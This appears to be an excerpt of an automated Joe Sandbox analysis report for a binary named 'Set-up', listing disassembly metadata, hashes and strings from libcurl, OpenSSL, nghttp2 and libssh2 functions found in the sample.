                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strcmpstrlen
                          • String ID: %s%s$%s%s=%s$127.0.0.1$::1$Cookie$Cookie: $Restricted outgoing cookies due to header size, '%s' not sent$localhost
                          • API String ID: 3853617425-1910649647
                          • Opcode ID: 6ddc9c0482d49ac9cd6f72e1503e54c81e3fbf0a0a80c13090485bd20141b840
                          • Instruction ID: e54e16737d836e8e355dc672c6e9cc9d225934190fe7d88c5be1651f7556979a
                          • Opcode Fuzzy Hash: 6ddc9c0482d49ac9cd6f72e1503e54c81e3fbf0a0a80c13090485bd20141b840
                          • Instruction Fuzzy Hash: 8371F271E04B016BD7609A209C42B6FBAD6AF91744F08C438FC4E97243EA76DD218796
                          APIs
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00098C0E,?), ref: 001D45E3
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00098C0E,?), ref: 001D460A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strcmp
                          • String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
                          • API String ID: 1004003707-1524119518
                          • Opcode ID: e0dac7f5ed9e7fc66bc783178c277be66a64eabf582bdc0145de7ed6322e148f
                          • Instruction ID: aa1332af135410a87e577dcaad47183bebd1c69007c5e5893fe3e5c19dd2c7ac
                          • Opcode Fuzzy Hash: e0dac7f5ed9e7fc66bc783178c277be66a64eabf582bdc0145de7ed6322e148f
                          • Instruction Fuzzy Hash: B7419775F80311A7E73437A46C83F2B31995B62B54F4A0126FE56653C3F7A6E91081A3
                          APIs
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00086884
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 000868AC
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000868C1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00086973
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00086983
                          • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00086995
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpystrchr$atoistrlen
                          • String ID: [
                          • API String ID: 444251876-784033777
                          • Opcode ID: 586252b1dd97846bec1e552c4ce3b1f289d5b6c8cc75d6f12a9d46d15e5884ac
                          • Instruction ID: 49ebf934311fcd7776cfad9fb9c02f19d445e787bc12f0ed2132e5ca5fca8467
                          • Opcode Fuzzy Hash: 586252b1dd97846bec1e552c4ce3b1f289d5b6c8cc75d6f12a9d46d15e5884ac
                          • Instruction Fuzzy Hash: 17B149719083915BDB79BA24C8A577FBBD8FF56308F1A052DE8C5C6182EB37C8848752
                          APIs
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00026467
                          Strings
                          • hsts.c, xrefs: 0002656B, 000265CF
                          • unlimited, xrefs: 000264A1
                          • mite, xrefs: 00026688
                          • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00026462
                          • %s%s "%s", xrefs: 000264AA
                          • %d%02d%02d %02d:%02d:%02d, xrefs: 000266D5
                          • %s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00026540
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: fwrite
                          • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
                          • API String ID: 3559309478-3911685517
                          • Opcode ID: c38b741645a01900783d27e5a3120d2a2576bd8ba452451ff44bf75e20f4461e
                          • Instruction ID: ccedba3bbb32c617fc99852e0c61a79b4c44f52c24dcd5745b57ddd8fd1074ee
                          • Opcode Fuzzy Hash: c38b741645a01900783d27e5a3120d2a2576bd8ba452451ff44bf75e20f4461e
                          • Instruction Fuzzy Hash: ED8107B2A08710ABEB119B24EC41F6B7BE9AF84714F08452CF94987252F732DD55C792
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0009DB9C,?,000C3BB8,00000000,?,?), ref: 000C6433
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
                          • API String ID: 1222420520-1470553442
                          • Opcode ID: a9ae92602960571d3ffa95a62513d697b365b1b0c632c6a0579376a6d7752168
                          • Instruction ID: 49664f7a542d5816972870613a50eb8590fb50d1881e63d58e648502a9acc4e1
                          • Opcode Fuzzy Hash: a9ae92602960571d3ffa95a62513d697b365b1b0c632c6a0579376a6d7752168
                          • Instruction Fuzzy Hash: 32714770604244AFCB69DF64D885FAE77F1BF84700F00852CF84A972A1EB72E950CB56
                          APIs
                            • Part of subcall function 00045EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00045ED4
                            • Part of subcall function 00064F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00064F9E
                          • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 0003EA9B
                            • Part of subcall function 000406F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00045663,?), ref: 000406F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$atoistrcpy
                          • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
                          • API String ID: 2444498485-4197959747
                          • Opcode ID: 736b125555ea05b2eb05cc348a073f230ceb63427ceb2aafd0aa71792e89d3ff
                          • Instruction ID: 02fb778e77b79d3ae7e028bd6479867c8897268280968501a995554956d2bb08
                          • Opcode Fuzzy Hash: 736b125555ea05b2eb05cc348a073f230ceb63427ceb2aafd0aa71792e89d3ff
                          • Instruction Fuzzy Hash: C7F11471904380ABEB629F10DC86BEA7BDDAF10304F084675FD49AE2D7E771A9148762
                          APIs
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0021A61C
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 0021A632
                            • Part of subcall function 0021A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,0021A654,?,PRIVATE KEY), ref: 0021A0BD
                            • Part of subcall function 0021A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 0021A0C8
                            • Part of subcall function 0021A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 0021A0DF
                            • Part of subcall function 001938A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0019397E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strcmpstrlen
                          • String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
                          • API String ID: 3853617425-3686562516
                          • Opcode ID: e08475d14826e0f011119c6cdc09d362f562372bac4cdddad8fe31eb3e1b7aaf
                          • Instruction ID: 66bf081badcd17382f638912aa2f4eea0193fdb9772f226b77971332309beafe
                          • Opcode Fuzzy Hash: e08475d14826e0f011119c6cdc09d362f562372bac4cdddad8fe31eb3e1b7aaf
                          • Instruction Fuzzy Hash: 75D12AB2D153017BE7217A60AC43F6F76D99FB0744F440828FD48A6283FB71E96586A3
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 0010C60E
                          Strings
                          • Unable to allocate new SFTP handle structure, xrefs: 0010C646
                          • Failed opening remote file, xrefs: 0010C531
                          • Too small FXP_STATUS, xrefs: 0010C517
                          • Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 0010C410
                          • Unable to send FXP_OPEN*, xrefs: 0010C45B
                          • Too small FXP_HANDLE, xrefs: 0010C582, 0010C675
                          • feWould block waiting for status message, xrefs: 0010C4A6
                          • Timeout waiting for status message, xrefs: 0010C4FB
                          • Response too small, xrefs: 0010C4E3
                          • Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 0010C444
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
                          • API String ID: 3510742995-1499184223
                          • Opcode ID: 6f8a1caf06d2dd059f1408f3b4f18d780bb88492be5e466713a0a626a6d51bfc
                          • Instruction ID: b826da71c6dfff450b76def9b57bd4663b0588cc81901dd0e83fd2bd68fc6efe
                          • Opcode Fuzzy Hash: 6f8a1caf06d2dd059f1408f3b4f18d780bb88492be5e466713a0a626a6d51bfc
                          • Instruction Fuzzy Hash: 72B1E3B0904741ABD714CF28DC85B6BB7A4FF94318F044A2CF4D6962D2E7B1E918CB92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(-00000004), ref: 0006C625
                          Strings
                          • STOP, xrefs: 0006C9C3
                          • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 0006C6CA
                          • unsupported MDTM reply format, xrefs: 0006C72D
                          • Skipping time comparison, xrefs: 0006C7D5
                          • The requested document is not new enough, xrefs: 0006C971
                          • MDTM failed: file does not exist or permission problem, continuing, xrefs: 0006C70D
                          • @Y, xrefs: 0006C6A0
                          • The requested document is not old enough, xrefs: 0006C7AA
                          • %04d%02d%02d %02d:%02d:%02d GMT, xrefs: 0006C8BB
                          • [%s] -> [%s], xrefs: 0006C9CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: %04d%02d%02d %02d:%02d:%02d GMT$@Y$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$MDTM failed: file does not exist or permission problem, continuing$STOP$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$[%s] -> [%s]$unsupported MDTM reply format
                          • API String ID: 39653677-1105712637
                          • Opcode ID: 32f83167604baac7ea57a69ed65ef7c79706730376dd9f35be2f19e4b3620dfe
                          • Instruction ID: 87e39052797dbbceb0a1bf81ba9ccd3baa77962fecca7b8003bfe354fc086c1d
                          • Opcode Fuzzy Hash: 32f83167604baac7ea57a69ed65ef7c79706730376dd9f35be2f19e4b3620dfe
                          • Instruction Fuzzy Hash: DFB117701087855BE721CB34C888FBABBE6AF46308F08452DE8D98B193E735F655CB61
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->state == NGHTTP2_STREAM_IDLE,nghttp2_session.c,00000528,?,?,-00000264,?,00000000,?,00000004,?), ref: 000AA93D
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES),nghttp2_session.c,0000052F,?,?,-00000264,?,00000000,?,00000004,?), ref: 000AA952
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream),nghttp2_session.c,0000052A,?,?,-00000264,?,00000000,?,00000004,?), ref: 000AA967
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,000005B2), ref: 000AA97C
                          Strings
                          • dep_stream, xrefs: 000AA977
                          • (stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream), xrefs: 000AA962
                          • nghttp2_session.c, xrefs: 000AA933, 000AA948, 000AA95D, 000AA972
                          • stream->state == NGHTTP2_STREAM_IDLE, xrefs: 000AA938
                          • !(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES), xrefs: 000AA94D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: !(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES)$(stream->flags & NGHTTP2_STREAM_FLAG_NO_RFC7540_PRIORITIES) || nghttp2_stream_in_dep_tree(stream)$dep_stream$nghttp2_session.c$stream->state == NGHTTP2_STREAM_IDLE
                          • API String ID: 1222420520-184303863
                          • Opcode ID: 1eb8ce7c60e2d2cbdf5fb8fafc2795c9a4e63ba2870811cb1f298e73aa3c3dd6
                          • Instruction ID: 271cb434f8321081931ed7d5f11ebf7fe8b1d934760a9b09c4ab2dd0de34ee4b
                          • Opcode Fuzzy Hash: 1eb8ce7c60e2d2cbdf5fb8fafc2795c9a4e63ba2870811cb1f298e73aa3c3dd6
                          • Instruction Fuzzy Hash: 3DE11671B047859FEB718EA48C01BEB7BE5AF53314F084429E8498A2C2E779D945CF63
                          APIs
                          • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,0006CC57), ref: 0006F028
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strrchr
                          • String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
                          • API String ID: 3418686817-2910492138
                          • Opcode ID: 8a8995416d3a5d7d28671d7773635bafbac327c82bdba5961565fd34a26e1a9e
                          • Instruction ID: 0a59d0c3fcdbebf6565c43f1e30abd9ddcff74fbd1ad4e1a88a7a3f42eb917b7
                          • Opcode Fuzzy Hash: 8a8995416d3a5d7d28671d7773635bafbac327c82bdba5961565fd34a26e1a9e
                          • Instruction Fuzzy Hash: F7A147757043559BE7209A28EC45BB77BDBAB96308F18407DE8488B283E7B6DD41C7D0
                          APIs
